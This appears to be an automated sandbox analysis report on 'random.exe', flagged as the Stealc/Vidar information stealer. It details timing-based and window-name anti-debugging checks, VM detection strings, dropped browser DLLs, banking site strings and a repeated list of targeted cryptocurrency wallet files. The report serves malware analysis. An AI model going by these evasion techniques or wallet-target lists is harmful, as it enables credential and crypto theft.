              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0733 second address: 51A074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 inc edi 0x00000007 jmp 00007EFCE8B91D0Dh 0x0000000c test al, al 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A074E second address: 51A0752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0752 second address: 51A07F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 jne 00007EFD58F5A02Ah 0x0000000f pushad 0x00000010 mov bl, ch 0x00000012 pushfd 0x00000013 jmp 00007EFCE8B91D13h 0x00000018 or eax, 6BDA4F2Eh 0x0000001e jmp 00007EFCE8B91D19h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ecx, edx 0x00000027 jmp 00007EFCE8B91D0Eh 0x0000002c shr ecx, 02h 0x0000002f jmp 00007EFCE8B91D10h 0x00000034 rep movsd 0x00000036 rep movsd 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c rep movsd 0x0000003e pushad 0x0000003f mov cx, 956Dh 0x00000043 mov ax, 1B69h 0x00000047 popad 0x00000048 mov ecx, edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007EFCE8B91D11h 0x00000053 xor ah, 00000076h 0x00000056 jmp 00007EFCE8B91D11h 0x0000005b popfd 0x0000005c pushad 0x0000005d popad 0x0000005e popad 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A07F7 second address: 51A085A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFCE8B9234Dh 0x00000009 sbb ax, D0D6h 0x0000000e jmp 00007EFCE8B92351h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 and ecx, 03h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushfd 0x00000022 jmp 00007EFCE8B92355h 0x00000027 xor ax, D4E6h 0x0000002c jmp 00007EFCE8B92351h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A085A second address: 51A08C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFCE8B91D17h 0x00000009 and ecx, 5530501Eh 0x0000000f jmp 00007EFCE8B91D19h 0x00000014 popfd 0x00000015 mov ch, 95h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a rep movsb 0x0000001c pushad 0x0000001d mov cx, dx 0x00000020 mov al, dl 0x00000022 popad 0x00000023 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007EFCE8B91D16h 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A08C4 second address: 51A08C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A08C8 second address: 51A08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A08CE second address: 51A0922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, ebx 0x0000000d jmp 00007EFCE8B92354h 0x00000012 mov ecx, dword ptr [ebp-10h] 0x00000015 pushad 0x00000016 call 00007EFCE8B9234Eh 0x0000001b mov ah, 25h 0x0000001d pop edx 0x0000001e mov dl, al 0x00000020 popad 0x00000021 mov dword ptr fs:[00000000h], ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007EFCE8B92352h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0922 second address: 51A0997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007EFCE8B91D0Bh 0x00000015 sub esi, 7F9ACFAEh 0x0000001b jmp 00007EFCE8B91D19h 0x00000020 popfd 0x00000021 mov eax, 7EA2B437h 0x00000026 popad 0x00000027 mov edx, esi 0x00000029 popad 0x0000002a pop edi 0x0000002b jmp 00007EFCE8B91D16h 0x00000030 pop esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007EFCE8B91D17h 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0ABE second address: 51A0AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0AC2 second address: 51A0ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0ADD second address: 51A0B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov ch, F3h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007EFCE8B92358h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007EFCE8B92357h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0B1C second address: 51A0B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0B22 second address: 51A0B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: 29FB25 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: 29FBE7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: 43FFB5 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: 4CAC16 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\random.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\random.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\random.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeAPI coverage: 0.8 %
              Source: C:\Users\user\Desktop\random.exe TID: 3380Thread sleep time: -30015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\random.exe TID: 5304Thread sleep time: -30015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA6C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6CA6C930
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: random.exe, random.exe, 00000000.00000002.1871985446.0000000000423000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: AAFIJKKE.0.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: random.exe, 00000000.00000002.1873121673.0000000001303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: AAFIJKKE.0.drBinary or memory string: discord.comVMware20,11696494690f
              Source: AAFIJKKE.0.drBinary or memory string: AMC password management pageVMware20,11696494690
              Source: AAFIJKKE.0.drBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: AAFIJKKE.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: AAFIJKKE.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: AAFIJKKE.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: AAFIJKKE.0.drBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: AAFIJKKE.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: AAFIJKKE.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: AAFIJKKE.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: AAFIJKKE.0.drBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: random.exe, 00000000.00000002.1873121673.000000000133A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: AAFIJKKE.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: AAFIJKKE.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: AAFIJKKE.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: AAFIJKKE.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: AAFIJKKE.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: AAFIJKKE.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: AAFIJKKE.0.drBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: AAFIJKKE.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: AAFIJKKE.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: AAFIJKKE.0.drBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: AAFIJKKE.0.drBinary or memory string: global block list test formVMware20,11696494690
              Source: random.exe, 00000000.00000002.1873121673.00000000012BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: AAFIJKKE.0.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: AAFIJKKE.0.drBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: AAFIJKKE.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: AAFIJKKE.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: random.exe, 00000000.00000002.1871985446.0000000000423000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: AAFIJKKE.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: AAFIJKKE.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: AAFIJKKE.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: AAFIJKKE.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\Desktop\random.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\random.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\random.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\random.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\random.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\random.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\random.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\random.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\random.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\random.exeFile opened: SICE
              Source: C:\Users\user\Desktop\random.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAB5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6CAB5FF0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA53480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6CA53480
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA8B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CA8B66C
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA8B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CA8B1F7
              Source: C:\Users\user\Desktop\random.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: random.exe PID: 1984, type: MEMORYSTR
              Source: random.exe, 00000000.00000002.1871985446.0000000000423000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: random.exeBinary or memory string: -V Program Manager
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA8B341 cpuid 0_2_6CA8B341
              Source: C:\Users\user\Desktop\random.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\random.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA535A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6CA535A0

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1458194965.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1873121673.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1871424059.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: random.exe PID: 1984, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Yara detected Vidar stealer
              Source: Yara matchFile source: Process Memory Space: random.exe PID: 1984, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
